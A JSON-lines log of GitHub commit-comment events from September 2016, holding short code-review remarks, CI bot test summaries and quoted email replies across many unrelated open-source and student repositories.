{"id":"4599733601","type":"CommitCommentEvent","actor":{"login":"JordiPolo"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19123082,"position":null,"line":null,"path":null,"commit_id":"8e2a1e58510dbefb5c707071fcba1584ba3b614f","created_at":"2016-09-22T00:15:47Z","updated_at":"2016-09-22T00:15:47Z","body":"Nice!"}},"created_at":"2016-09-22T00:15:47Z"}
{"id":"4599735407","type":"CommitCommentEvent","actor":{"login":"tmaurer13"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123088,"position":null,"line":null,"path":null,"commit_id":"61738e4132ba5db81038e15411742e370aa740fd","created_at":"2016-09-22T00:16:25Z","updated_at":"2016-09-22T00:16:25Z","body":"No worries, Mengyu! Thanks for the updates! Does this change any of the outputs in the write-up?"}},"created_at":"2016-09-22T00:16:25Z"}
{"id":"4599735902","type":"CommitCommentEvent","actor":{"login":"Sumukh"},"repo":{"name":"Cal-CS-61A-Staff/ok"},"payload":{"comment":{"id":19123092,"position":11,"line":94,"path":"server/utils.py","commit_id":"08ff4a41774c0c9a0fbff93e83bc80574191a6b6","created_at":"2016-09-22T00:16:33Z","updated_at":"2016-09-22T00:16:33Z","body":"That's a good idea but it's not worth going down that path now\r\n\r\nI'm not at all concerned about the time to do a simple string manipulation operation on each request (or 1500 in the case of the admin view). \r\n\r\nIt's not worth memoizing. "}},"created_at":"2016-09-22T00:16:33Z"}
{"id":"4599738606","type":"CommitCommentEvent","actor":{"login":"Gabrielle0915"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123104,"position":null,"line":null,"path":null,"commit_id":"61738e4132ba5db81038e15411742e370aa740fd","created_at":"2016-09-22T00:17:26Z","updated_at":"2016-09-22T00:17:26Z","body":"No. \n> On Sep 21, 2016, at 5:16 PM, tmaurer13 <notifications@github.com> wrote:\n> \n> No worries, Mengyu! Thanks for the updates! Does this change any of the outputs in the write-up?\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/sudatta0993/STAT_215_Project_1/commit/61738e4132ba5db81038e15411742e370aa740fd#commitcomment-19123088>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AS5RvTBFEvLBbZczPSkCMkth22cg5RfEks5qscjZgaJpZM4KDaNR>.\n> \n\n"}},"created_at":"2016-09-22T00:17:26Z"}
{"id":"4599739278","type":"CommitCommentEvent","actor":{"login":"tmaurer13"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123108,"position":null,"line":null,"path":null,"commit_id":"61738e4132ba5db81038e15411742e370aa740fd","created_at":"2016-09-22T00:17:39Z","updated_at":"2016-09-22T00:17:39Z","body":"Okay, great, just checking :)"}},"created_at":"2016-09-22T00:17:39Z"}
{"id":"4599745437","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19123127,"position":null,"line":null,"path":null,"commit_id":"8e2a1e58510dbefb5c707071fcba1584ba3b614f","created_at":"2016-09-22T00:19:42Z","updated_at":"2016-09-22T00:19:42Z","body":"I was just about to send an email to the mailing list, requesting to rename Kernel.rand to Kernel.random to make it consistent with Enum.random and Enum.take_random"}},"created_at":"2016-09-22T00:19:42Z"}
{"id":"4599746277","type":"CommitCommentEvent","actor":{"login":"almereyda"},"repo":{"name":"GitbookIO/gitbook"},"payload":{"comment":{"id":19123130,"position":5,"line":5,"path":"docs/faq.md","commit_id":"2cfbf5411ca10cdf34f5d8442b61f68c9c4c4d9d","created_at":"2016-09-22T00:19:58Z","updated_at":"2016-09-22T00:19:58Z","body":"`s/gather/gathered/`\r\n\r\nhttps://help.gitbook.com/faq.html > 404"}},"created_at":"2016-09-22T00:19:58Z"}
{"id":"4599746491","type":"CommitCommentEvent","actor":{"login":"chantra"},"repo":{"name":"iovisor/bcc"},"payload":{"comment":{"id":19123131,"position":null,"line":null,"path":null,"commit_id":"52938058460cadac111234b92fd0018c03327e92","created_at":"2016-09-22T00:20:02Z","updated_at":"2016-09-22T00:20:02Z","body":"@Murulidhar what does this diff has to do with your issue? You should open an issue with the content of the backtrace if you want people to be able to help you."}},"created_at":"2016-09-22T00:20:02Z"}
{"id":"4599748602","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19123136,"position":null,"line":null,"path":null,"commit_id":"e6e646da36bf4e14044de0a796f2f66520af169c","created_at":"2016-09-22T00:20:47Z","updated_at":"2016-09-22T00:20:47Z","body":"I tried your command /pvp and its not working lol Its probably best to submit code that works / was tested on a dev environment . "}},"created_at":"2016-09-22T00:20:47Z"}
{"id":"4599750213","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19123141,"position":9,"line":72,"path":"lesson_4/train.rb","commit_id":"0eaea6f1a1b04f25546774f3b35a0232ebda7131","created_at":"2016-09-22T00:21:17Z","updated_at":"2016-09-22T00:21:17Z","body":"Виктор, теперь `@wagons_count` только отнимается )"}},"created_at":"2016-09-22T00:21:17Z"}
{"id":"4599751277","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19123143,"position":8,"line":71,"path":"lesson_4/train.rb","commit_id":"0eaea6f1a1b04f25546774f3b35a0232ebda7131","created_at":"2016-09-22T00:21:38Z","updated_at":"2016-09-22T00:21:38Z","body":"Можно просто `@added_wagons.pop`."}},"created_at":"2016-09-22T00:21:38Z"}
{"id":"4599752611","type":"CommitCommentEvent","actor":{"login":"ruelyap-bankstream"},"repo":{"name":"ruelyap-bankstream/RY-HelloWorld"},"payload":{"comment":{"id":19123145,"position":null,"line":null,"path":null,"commit_id":"adfb4f579dda01a688cfb7c53dcda262fe7a6883","created_at":"2016-09-22T00:22:04Z","updated_at":"2016-09-22T00:22:04Z","body":"i shall commit to this commit"}},"created_at":"2016-09-22T00:22:04Z"}
{"id":"4599756325","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19123157,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-22T00:23:19Z","updated_at":"2016-09-22T00:23:19Z","body":"I'm pretty sure that commit should be reverted."}},"created_at":"2016-09-22T00:23:19Z"}
{"id":"4599757979","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19123159,"position":null,"line":null,"path":null,"commit_id":"e6e646da36bf4e14044de0a796f2f66520af169c","created_at":"2016-09-22T00:23:54Z","updated_at":"2016-09-22T00:23:54Z","body":"I can create a new command that is just more work when I could make the work load less work by doing this that actually works. you could still sit to recover health it would only put you on leave and if you wanted to go back you prone. Yes this is a dirty method but Id rather shorten the work load i have then spend a hour on creating a whole brand new command that does the exact same functions . If you can get your command to work Ill use it. Have not spent any time on it working on the l2Server at the moment . I did compile it and try using /pvp no such command when using it ."}},"created_at":"2016-09-22T00:23:54Z"}
{"id":"4599762612","type":"CommitCommentEvent","actor":{"login":"Murulidhar"},"repo":{"name":"iovisor/bcc"},"payload":{"comment":{"id":19123176,"position":null,"line":null,"path":null,"commit_id":"52938058460cadac111234b92fd0018c03327e92","created_at":"2016-09-22T00:25:34Z","updated_at":"2016-09-22T00:25:34Z","body":"Sorry, I didn't know this. So I asked you directly.\r\nAnyways I just now solved it.\r\nThanks "}},"created_at":"2016-09-22T00:25:34Z"}
{"id":"4599762881","type":"CommitCommentEvent","actor":{"login":"sudatta0993"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123178,"position":null,"line":null,"path":null,"commit_id":"be8aec9aaee2ff1640ebeb83f30c2bda40b04be7","created_at":"2016-09-22T00:25:40Z","updated_at":"2016-09-22T00:25:40Z","body":"I'm sorry. I don't get why we need this file"}},"created_at":"2016-09-22T00:25:40Z"}
{"id":"4599764400","type":"CommitCommentEvent","actor":{"login":"sudatta0993"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123182,"position":null,"line":null,"path":null,"commit_id":"90c66a22b79623e9af7322ec17ef396b033c83b0","created_at":"2016-09-22T00:26:11Z","updated_at":"2016-09-22T00:26:11Z","body":"I'm sorry! I don't know why we need this file."}},"created_at":"2016-09-22T00:26:11Z"}
{"id":"4599771242","type":"CommitCommentEvent","actor":{"login":"shuangzhou"},"repo":{"name":"nla/amberdb"},"payload":{"comment":{"id":19123200,"position":null,"line":null,"path":null,"commit_id":"16d556e1a9558c65fa2c31f7be507814f1212da5","created_at":"2016-09-22T00:28:37Z","updated_at":"2016-09-22T00:28:37Z","body":"👍 "}},"created_at":"2016-09-22T00:28:37Z"}
{"id":"4599773463","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19123207,"position":null,"line":null,"path":null,"commit_id":"bc4ea02124ea7340f4901cf3a14b734e50c823eb","created_at":"2016-09-22T00:29:24Z","updated_at":"2016-09-22T00:29:24Z","body":"TaskCluster: @cgsheeh does not have permission to trigger tasks."}},"created_at":"2016-09-22T00:29:24Z"}
{"id":"4599777797","type":"CommitCommentEvent","actor":{"login":"tmaurer13"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123232,"position":null,"line":null,"path":null,"commit_id":"be8aec9aaee2ff1640ebeb83f30c2bda40b04be7","created_at":"2016-09-22T00:30:52Z","updated_at":"2016-09-22T00:30:52Z","body":"I only uploaded it for the time being until I get those numbers into the\nreport, so if you guys want to take a look at the permutation results I\ngot, you could.\n\nOn Wed, Sep 21, 2016 at 5:25 PM, Sudatta Mohanty <notifications@github.com>\nwrote:\n\n> I'm sorry. I don't get why we need this file\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sudatta0993/STAT_215_Project_1/commit/be8aec9aaee2ff1640ebeb83f30c2bda40b04be7#commitcomment-19123178>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARiOXe-RgpAtYYVXOhSH-1xXLBPDuFPoks5qscsEgaJpZM4KDag1>\n> .\n>\n"}},"created_at":"2016-09-22T00:30:52Z"}
{"id":"4599779986","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19123242,"position":null,"line":null,"path":null,"commit_id":"9c7187bf46d523465e6693ddc0804ce2af7cd736","created_at":"2016-09-22T00:31:40Z","updated_at":"2016-09-22T00:31:40Z","body":"Not only this card, all the Æ have been retroactively removed from the card names. So if one of these cards is reference in another card it will use Ae instead of Æ."}},"created_at":"2016-09-22T00:31:40Z"}
{"id":"4599782544","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123249,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-22T00:32:35Z","updated_at":"2016-09-22T00:32:35Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2329 of 2364 tests passed, 538 test warnings)\n\n * 568 tests had: AUD diffs.\n * 119 tests had: ERR diffs.\n * 29 tests had: Table big diffs.\n * 185 tests had: EIO diffs.\n * 27 tests had: ESO small diffs.\n * 14 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: MTR big diffs.\n * 24 tests had: RDD diffs.\n * 14 tests had: MTR small diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.52%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T00:32:35Z"}
{"id":"4599783396","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19123252,"position":15,"line":36,"path":"src/common/datomish/js.cljs","commit_id":"5b4800556bd8746807a6e64df21336dcd8a75e9f","created_at":"2016-09-22T00:32:52Z","updated_at":"2016-09-22T00:32:52Z","body":"The next commit is \"… and make the JS API work\"."}},"created_at":"2016-09-22T00:32:52Z"}
{"id":"4599783690","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":19123255,"position":68,"line":125,"path":"Lesson_6/train.rb","commit_id":"07c1253d1f1e52dc993d5e1dc4d1afc904cfa64e","created_at":"2016-09-22T00:32:59Z","updated_at":"2016-09-22T00:32:59Z","body":"В принципе нам достаточно чтобы просто не было вызвано ни одного исключения, поэтому можно не возвращать `true`. Если вернётся `nil` нас это устроит."}},"created_at":"2016-09-22T00:32:59Z"}
{"id":"4599784092","type":"CommitCommentEvent","actor":{"login":"ignisf"},"repo":{"name":"discourse/mini_racer"},"payload":{"comment":{"id":19123256,"position":null,"line":null,"path":null,"commit_id":"767814af4eb88365421c5d74f1ac9d04214283ce","created_at":"2016-09-22T00:33:07Z","updated_at":"2016-09-22T00:33:07Z","body":"![fzmc8rh](https://cloud.githubusercontent.com/assets/1153188/18733617/42fd75b2-8075-11e6-84bc-1608e10295c8.png)\r\n\r\n😢 "}},"created_at":"2016-09-22T00:33:07Z"}
{"id":"4599785253","type":"CommitCommentEvent","actor":{"login":"rclai"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19123257,"position":null,"line":null,"path":null,"commit_id":"2f788524112d59f62a295e7f4b0c1cfa0f6203fe","created_at":"2016-09-22T00:33:31Z","updated_at":"2016-09-22T00:33:31Z","body":"@javache, this fixes the issue, but it seems to have caused the development logs to get noisy? I don't know if this is an Xcode 8 issue or this commit's side-effect."}},"created_at":"2016-09-22T00:33:31Z"}
{"id":"4599788124","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19123266,"position":28,"line":18,"path":"addon/package.json","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-22T00:34:33Z","updated_at":"2016-09-22T00:34:33Z","body":"Pretty much, yes. Attempting to run Babel from `node_modules` resulted in empty output, and we need to include `babel-polyfill`, so it's webpack or grunt…"}},"created_at":"2016-09-22T00:34:33Z"}
{"id":"4599789046","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19123269,"position":43,"line":43,"path":"addon/src/index.js","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-22T00:34:54Z","updated_at":"2016-09-22T00:34:54Z","body":"Hey, multiline is great!"}},"created_at":"2016-09-22T00:34:54Z"}
{"id":"4599789560","type":"CommitCommentEvent","actor":{"login":"rnewman"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19123271,"position":74,"line":74,"path":"addon/src/index.js","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-22T00:35:06Z","updated_at":"2016-09-22T00:35:06Z","body":"Yeah, this was me making sure it worked :)"}},"created_at":"2016-09-22T00:35:06Z"}
{"id":"4599799074","type":"CommitCommentEvent","actor":{"login":"warmdev"},"repo":{"name":"comses/miracle"},"payload":{"comment":{"id":19123293,"position":null,"line":null,"path":null,"commit_id":"00b18217779636548bd2641b57c28269ef5c1de4","created_at":"2016-09-22T00:38:37Z","updated_at":"2016-09-22T00:38:37Z","body":"Likely the Radiant URL is wrong? It should be `http://localhost:3838/base` "}},"created_at":"2016-09-22T00:38:37Z"}
{"id":"4599803214","type":"CommitCommentEvent","actor":{"login":"zhx828"},"repo":{"name":"cBioPortal/iViz"},"payload":{"comment":{"id":19123304,"position":7,"line":65,"path":"app/styles/components/vc/_editable-row.scss","commit_id":"0c8cbf73377a9fa772265c895feb8a670813a3ee","created_at":"2016-09-22T00:40:04Z","updated_at":"2016-09-22T00:40:04Z","body":"Just want to double check, you probably notice this. This line will force all button under editable tow sharing same and only 14px font-size right? Then later btn-sm or btn-lg won't work"}},"created_at":"2016-09-22T00:40:04Z"}
{"id":"4599809211","type":"CommitCommentEvent","actor":{"login":"HotelCalifornia"},"repo":{"name":"purduesigbots/pros-atom"},"payload":{"comment":{"id":19123318,"position":null,"line":null,"path":null,"commit_id":"5b21f7b41365faa8c762a6c1932a28109c05a5d6","created_at":"2016-09-22T00:42:15Z","updated_at":"2016-09-22T00:42:15Z","body":"T134"}},"created_at":"2016-09-22T00:42:15Z"}
{"id":"4599809229","type":"CommitCommentEvent","actor":{"login":"ytobi"},"repo":{"name":"ytobi/hello-world"},"payload":{"comment":{"id":19123319,"position":5,"line":3,"path":"README.md","commit_id":"c8bbe2559e51a209be799748c6343734cf951cd7","created_at":"2016-09-22T00:42:15Z","updated_at":"2016-09-22T00:42:15Z","body":"sharp right"}},"created_at":"2016-09-22T00:42:15Z"}
{"id":"4599816806","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123336,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-22T00:44:54Z","updated_at":"2016-09-22T00:44:54Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T00:44:54Z"}
{"id":"4599818063","type":"CommitCommentEvent","actor":{"login":"mholden8"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19123337,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-22T00:45:21Z","updated_at":"2016-09-22T00:45:21Z","body":"@tavaughan What exactly is your workflow?\r\n\r\nThis method assumes that both the pivot calibration and spin calibration have already been done. So, the flipping behaviour will only be correct if you have done (or have somehow otherwise obtained) both a pivot calibration and a spin calibration. Otherwise, yes, the flipping will depend on the orientation of the sensor.\r\n\r\nAs @lassoan mentioned, given a pivot calibration and spin calibration, the method assumes that the sensor/marker origin is on the same side as the tool base. "}},"created_at":"2016-09-22T00:45:21Z"}
{"id":"4599820878","type":"CommitCommentEvent","actor":{"login":"Amir-61"},"repo":{"name":"strongloop/loopback-swagger"},"payload":{"comment":{"id":19123346,"position":null,"line":null,"path":null,"commit_id":"d2833dad8dab7112c0910ebeb9f3f5b684fa9a58","created_at":"2016-09-22T00:46:20Z","updated_at":"2016-09-22T00:46:20Z","body":"@superkhau \r\n>And update to ^3.0.0-alpha.8\r\n\r\nActually juggler should be removed here"}},"created_at":"2016-09-22T00:46:20Z"}
{"id":"4599821996","type":"CommitCommentEvent","actor":{"login":"sudatta0993"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123350,"position":null,"line":null,"path":null,"commit_id":"be8aec9aaee2ff1640ebeb83f30c2bda40b04be7","created_at":"2016-09-22T00:46:45Z","updated_at":"2016-09-22T00:46:45Z","body":"Okay! Let's remove it once we get it into the review "}},"created_at":"2016-09-22T00:46:45Z"}
{"id":"4599824379","type":"CommitCommentEvent","actor":{"login":"dougsyer"},"repo":{"name":"zenoss/ZenPacks.zenoss.PythonCollector"},"payload":{"comment":{"id":19123356,"position":null,"line":null,"path":null,"commit_id":"eb1c5caef00ab0f6999c6153d35f262074485a5b","created_at":"2016-09-22T00:47:34Z","updated_at":"2016-09-22T00:47:34Z","body":"Ive learned to wrap any methods generating the config key or config with logging and a deterministic failure state id advise anyone doing a plugin to be careful to fail gracefully with logging when overriding those methods"}},"created_at":"2016-09-22T00:47:34Z"}
{"id":"4599828631","type":"CommitCommentEvent","actor":{"login":"andreasnoack"},"repo":{"name":"JuliaSmoothOptimizers/PROPACK.jl"},"payload":{"comment":{"id":19123368,"position":null,"line":null,"path":null,"commit_id":"89711514b8baebe178e2f07c1329612a9ba0a616","created_at":"2016-09-22T00:49:09Z","updated_at":"2016-09-22T00:49:09Z","body":"👍 "}},"created_at":"2016-09-22T00:49:09Z"}
{"id":"4599832815","type":"CommitCommentEvent","actor":{"login":"colemonnahan"},"repo":{"name":"admb-project/admb"},"payload":{"comment":{"id":19123382,"position":null,"line":null,"path":null,"commit_id":"ae480c03fa48d401bcbc22a5b31308345e68ddf8","created_at":"2016-09-22T00:50:45Z","updated_at":"2016-09-22T00:50:45Z","body":"Yes this seems fine. Why does it matter though? Won't nan > 0.5 be nan, so it catches it anyway?"}},"created_at":"2016-09-22T00:50:45Z"}
{"id":"4599833987","type":"CommitCommentEvent","actor":{"login":"powerdmy"},"repo":{"name":"powerdmy/powerdmy.github.io"},"payload":{"comment":{"id":19123384,"position":null,"line":null,"path":null,"commit_id":"6ff143f53dfaadce072573fda059722c0823482a","created_at":"2016-09-22T00:51:11Z","updated_at":"2016-09-22T00:51:11Z","body":"this is my index"}},"created_at":"2016-09-22T00:51:11Z"}
{"id":"4599836043","type":"CommitCommentEvent","actor":{"login":"ArthixFR"},"repo":{"name":"gekt/DevForGaming"},"payload":{"comment":{"id":19123391,"position":null,"line":null,"path":null,"commit_id":"86e48d13a18b0332c61ec4670b79cfe135e7ddef","created_at":"2016-09-22T00:51:55Z","updated_at":"2016-09-22T00:51:55Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6IYbZ7n1&#x2F;1-test\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> test</a>"}},"created_at":"2016-09-22T00:51:55Z"}
{"id":"4599840230","type":"CommitCommentEvent","actor":{"login":"stepps00"},"repo":{"name":"whosonfirst-data/whosonfirst-data"},"payload":{"comment":{"id":19123398,"position":null,"line":null,"path":null,"commit_id":"f6340dfbaf45ee907221f0df00d4c1f8aa0b40e5","created_at":"2016-09-22T00:53:29Z","updated_at":"2016-09-22T00:53:29Z","body":"note: need to deprecate. this commit only includes concordance. "}},"created_at":"2016-09-22T00:53:29Z"}
{"id":"4599840737","type":"CommitCommentEvent","actor":{"login":"jbhatt-salesforce"},"repo":{"name":"jbhatt-salesforce/Warden-Service"},"payload":{"comment":{"id":19123399,"position":107,"line":219,"path":"WardenClient/src/test/java/com/salesforce/dva/warden/client/PolicyServiceTest.java","commit_id":"527a5405ead600fdb94935039fa03faa4b187e4e","created_at":"2016-09-22T00:53:40Z","updated_at":"2016-09-22T00:53:40Z","body":"@saaja-sfdc This is the test that is not passing. "}},"created_at":"2016-09-22T00:53:40Z"}
{"id":"4599840929","type":"CommitCommentEvent","actor":{"login":"superkhau"},"repo":{"name":"strongloop/loopback-swagger"},"payload":{"comment":{"id":19123403,"position":null,"line":null,"path":null,"commit_id":"d2833dad8dab7112c0910ebeb9f3f5b684fa9a58","created_at":"2016-09-22T00:53:45Z","updated_at":"2016-09-22T00:53:45Z","body":"Fixed at #59 "}},"created_at":"2016-09-22T00:53:45Z"}
{"id":"4599843000","type":"CommitCommentEvent","actor":{"login":"jbhatt-salesforce"},"repo":{"name":"jbhatt-salesforce/Warden-Service"},"payload":{"comment":{"id":19123406,"position":73,"line":92,"path":"WardenClient/src/test/resources/PolicyServiceTest.testGetPolicies.json","commit_id":"527a5405ead600fdb94935039fa03faa4b187e4e","created_at":"2016-09-22T00:54:29Z","updated_at":"2016-09-22T00:54:29Z","body":"@saaja-sfdc This is the test that is not passing. This is the input."}},"created_at":"2016-09-22T00:54:29Z"}
{"id":"4599845317","type":"CommitCommentEvent","actor":{"login":"jbhatt-salesforce"},"repo":{"name":"jbhatt-salesforce/Warden-Service"},"payload":{"comment":{"id":19123409,"position":33,"line":203,"path":"WardenClient/src/main/java/com/salesforce/dva/warden/client/PolicyService.java","commit_id":"527a5405ead600fdb94935039fa03faa4b187e4e","created_at":"2016-09-22T00:55:16Z","updated_at":"2016-09-22T00:55:16Z","body":"@saaja-sfdc This is the test that is not passing. This is the method implementation."}},"created_at":"2016-09-22T00:55:16Z"}
{"id":"4599852848","type":"CommitCommentEvent","actor":{"login":"tmaurer13"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19123423,"position":null,"line":null,"path":null,"commit_id":"be8aec9aaee2ff1640ebeb83f30c2bda40b04be7","created_at":"2016-09-22T00:57:56Z","updated_at":"2016-09-22T00:57:56Z","body":"Yup, np\n\nOn Wed, Sep 21, 2016 at 5:46 PM, Sudatta Mohanty <notifications@github.com>\nwrote:\n\n> Okay! Let's remove it once we get it into the review\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sudatta0993/STAT_215_Project_1/commit/be8aec9aaee2ff1640ebeb83f30c2bda40b04be7#commitcomment-19123350>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARiOXdtSRjrNXQgpkS7NHt0MWp0lTMVIks5qsc_1gaJpZM4KDag1>\n> .\n>\n"}},"created_at":"2016-09-22T00:57:56Z"}
{"id":"4599853611","type":"CommitCommentEvent","actor":{"login":"adelikat"},"repo":{"name":"TASVideos/BizHawk"},"payload":{"comment":{"id":19123425,"position":null,"line":null,"path":null,"commit_id":"955fbd0508d57fc20cd849321a27c8e4120d5067","created_at":"2016-09-22T00:58:12Z","updated_at":"2016-09-22T00:58:12Z","body":"are you sure it is fixed? When I play the game it goes to the game selection menu but then immediately loads Micro Machines (the 2nd game selection)"}},"created_at":"2016-09-22T00:58:12Z"}
{"id":"4599855209","type":"CommitCommentEvent","actor":{"login":"oanylund"},"repo":{"name":"oanylund/snake"},"payload":{"comment":{"id":19123429,"position":5,"line":31,"path":"main.c","commit_id":"b5ad313b5c1f29cff08231696553ece3c5198ab5","created_at":"2016-09-22T00:58:47Z","updated_at":"2016-09-22T00:58:47Z","body":"@MortenBertheussen, trur ikke vi har brukt så mange tima på et mellomrom før siden inf...."}},"created_at":"2016-09-22T00:58:47Z"}
{"id":"4599864027","type":"CommitCommentEvent","actor":{"login":"bboe"},"repo":{"name":"choruk/foos_portal"},"payload":{"comment":{"id":19123445,"position":5,"line":20,"path":"app/views/users/index.html.erb","commit_id":"680762eaabf59406f93de53a0c42418998d666b6","created_at":"2016-09-22T01:01:46Z","updated_at":"2016-09-22T01:01:46Z","body":"Do we want to hide a player's rankings if they haven't played in some time? It would make sense that they still posses that ranking -- they're just not included in the scoreboard."}},"created_at":"2016-09-22T01:01:46Z"}
{"id":"4599868301","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19123454,"position":null,"line":null,"path":null,"commit_id":"959c2d264f5d976f087c8682776cd8bd7c32ea9e","created_at":"2016-09-22T01:03:24Z","updated_at":"2016-09-22T01:03:24Z","body":"Test to make sure you can tame it and check console to make sure it does not error out."}},"created_at":"2016-09-22T01:03:24Z"}
{"id":"4599869331","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19123460,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-22T01:03:48Z","updated_at":"2016-09-22T01:03:48Z","body":"iteration (evanweaver) - Win64-Windows-7-VisualStudio-12: Tests Failed (2166 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.48%25-red.svg)</a> \n"}},"created_at":"2016-09-22T01:03:48Z"}
{"id":"4599872068","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19123468,"position":null,"line":null,"path":null,"commit_id":"473a29c63d1003a0cfb64ea7dcd5c2756d1ec763","created_at":"2016-09-22T01:04:50Z","updated_at":"2016-09-22T01:04:50Z","body":"HEVC 10bit fixed.\r\nhttps://github.com/shminer/android_kernel_lge_g5/commit/8b952a394f85f2720524743967108988cd54377f"}},"created_at":"2016-09-22T01:04:50Z"}
